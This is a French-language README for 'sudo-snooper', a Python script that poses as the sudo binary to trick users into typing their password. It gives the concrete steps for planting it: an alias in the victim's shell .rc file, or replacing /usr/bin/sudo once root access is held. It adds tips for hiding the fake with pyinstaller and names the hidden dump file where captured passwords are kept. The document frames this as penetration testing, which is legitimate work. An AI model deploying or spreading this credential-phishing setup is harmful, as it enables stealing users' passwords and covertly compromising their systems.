
Script Python qui imite le binaire sudo original pour tromper les utilisateurs et leur faire entrer leur mot de passe.
sudo-snooper se comporte comme le binaire sudo original pour tromper les utilisateurs afin qu'ils saisissent leur mot de passe.
Il affichera une invite factice, identique à l'originale, demandant à l'utilisateur de saisir son mot de passe sudo.
Cela peut être utile dans les tests d'intrusion ou les évaluations de sécurité pour tester la connaissance des utilisateurs.
Cette option est plus facile à mettre en œuvre et plus portable, mais elle pourrait être plus visible pour les utilisateurs attentifs.
Modifiez le fichier .rc du shell utilisé par l'utilisateur (peut être .bashrc, .zshrc, etc.) et ajoutez ce qui suit :
alias sudo='python3 /path/to/sudo-snooper.py'
Assurez-vous que sudo-snooper.py a les permissions correctes.
Vous avez besoin d'un accès root pour cette option d'installation
Cela devient utile uniquement si vous avez déjà un accès root mais que vous ne pouvez pas casser les
hachages de /etc/shadow pour une raison quelconque. En gros, vous pouvez hameçonner le mot de passe
de l'utilisateur.
# mv /usr/bin/sudo /usr/bin/somename
Modifiez ces éléments dans sudo-snooper.py :
dumpdir = "/tmp/.snooper"
dumpfile = "/tmp/.snooper/dump.txt"
sudo = 'sudo'
# install -dm755 sudo-snooper.py /usr/bin/sudo
donnez les permissions nécessaires au fichier python
Vous pouvez faire plus sophistiqué ici en créant un fichier exécutable non lisible pour les utilisateurs, mais je ne vais pas entrer dans ce détail. Consultez certaines réponses ici pour cela.
NOTE : Une manière un peu plus convaincante d'installer ceci est de le compiler avec pyinstaller afin qu'il n'apparaisse pas comme un fichier python lorsque file /usr/bin/sudo est exécuté.
Pour ce faire sous Archlinux : pyinstaller --onefile sudo-snooper.py fonctionnera. Cependant, notez qu'une fois compilé, vous ne pourrez plus modifier les paramètres dans le binaire compilé.
Une fois installé, sudo-snooper peut être appelé comme le sudo normal.
Par exemple, exécuter
sudo vim /etc/resolv.conf
entraînera l'appel de sudo-snooper (en supposant qu'il est correctement installé).
Il demandera le mot de passe de l'utilisateur, puis exécutera la commande en la redirigeant vers le vrai binaire sudo si le mot de passe est correct.
Vous pouvez ensuite récupérer le mot de passe de l'utilisateur en lisant le fichier de vidage dans les paramètres.